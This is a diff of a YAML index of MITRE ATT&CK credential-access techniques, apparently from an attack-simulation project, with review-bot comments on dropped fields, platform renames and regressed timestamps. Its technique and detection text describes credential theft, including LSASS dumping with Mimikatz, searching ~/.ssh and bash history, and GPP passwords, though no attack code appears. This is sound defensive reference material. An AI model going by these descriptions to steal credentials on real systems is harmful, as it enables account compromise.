x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
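Review bot: `x_mitre_permissions_required: - User` is dropped from T1555.003 here (and from T1558.004 in the first hunk) with no replacement, so anything in the project that reads required permissions from this index, for example to flag tests that need elevation, will now find nothing for these techniques; either confirm no consumer reads the field or keep a derived value. The rest of the hunk is a pure reorder of the same platforms, domains and external_references (Mimikittenz moves from last to first in the reference list) plus the `1.1` to `1.2` version bump, which matches the new `modified: '2024-08-15T14:13:45.294Z'` stamp.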
@@ -44914,23 +45681,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -44963,21 +45730,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -44988,7 +45754,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45022,7 +45788,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45050,7 +45816,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45061,14 +45827,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
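Review bot: the `modified` timestamp for T1557.001 moves backward, from 2023-04-25 to 2022-10-25, and its `x_mitre_attack_spec_version` stays at 3.0.0 while every other object touched in this diff is at 3.2.0; that pattern suggests the generator pulled an older copy of this attack-pattern, or the source bundle carries a stale duplicate. Check which version of T1557.001 the bundle actually contains before merging, since a regressed timestamp will make the next regeneration report this technique as updated again.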
@@ -45176,12 +45941,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45218,6 +45982,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45230,7 +45995,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45280,12 +46045,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45311,6 +46075,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45326,18 +46091,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
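Review bot: the platform list for T1110.003 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`; the same rename is applied to the other cloud techniques below. Any per-platform index output that is keyed on the old platform names will be empty or stale for these techniques after this change, so the generator's platform list (and the names of the files it emits) needs the matching rename in the same change. The `x_mitre_version: '1.5'` to `'1.6'` bump is consistent with a platform change.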
@@ -45364,14 +46129,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45382,13 +46144,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45402,6 +46164,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45412,12 +46175,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45492,7 +46255,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -45538,7 +46300,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
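Review bot: the `modified` timestamp for T1558.001 moves backward, from `'2022-04-25T14:00:00.188Z'` to `'2020-11-05T16:07:03.779Z'`, while the rest of the diff moves timestamps forward to 2024 and the object's visible content is unchanged. A regressing `modified` on an unchanged object usually means the previous and current index runs read different source bundles; confirm which bundle is authoritative before merging rather than shipping a mix.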
@@ -45573,16 +46335,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
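Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted from T1558.001 together with `spec_version: '2.1'` and no replacement appears in this hunk, whereas most other techniques in the diff carry `x_mitre_attack_spec_version: 3.2.0`. In the same object `x_mitre_permissions_required: - User` is kept as unchanged context, while that field is deleted for T1552.003, T1552.006 and T1056 later in the diff. Both point to T1558.001 not having been refreshed from the same source as its neighbours; either regenerate it or note why it differs.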
@@ -45592,21 +46352,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -45655,33 +46417,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
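Review bot: almost all of this hunk is key reordering for T1552.003: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and re-added with the same values further down, so the substantive changes (the `modified` date, the version bump and the updated SlideShare URL in the following hunk) are hard to pick out. If the generator serialises the STIX object in whatever order the source gives it, sorting keys or preserving the existing order would keep future index diffs reviewable. T1552.006 below shows the same pattern.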
@@ -45696,25 +46436,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -45788,7 +46546,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -45850,11 +46607,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -45903,6 +46659,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -45911,6 +46668,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -45921,13 +46679,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -45983,44 +46742,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46037,25 +46763,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
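Review bot: `modified` for T1556.008 moves backward from `'2023-10-31T14:00:00.188Z'` to `'2023-05-04T18:02:51.318Z'`, and the next hunk leaves that object at `x_mitre_attack_spec_version: 3.1.0` while its neighbours move to `3.2.0`. Same concern as for T1558.001 above: this object looks like it came from a different bundle than the rest of the regeneration, and the timestamp regression should be fixed at the source.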
@@ -46130,11 +46885,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46178,11 +46932,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
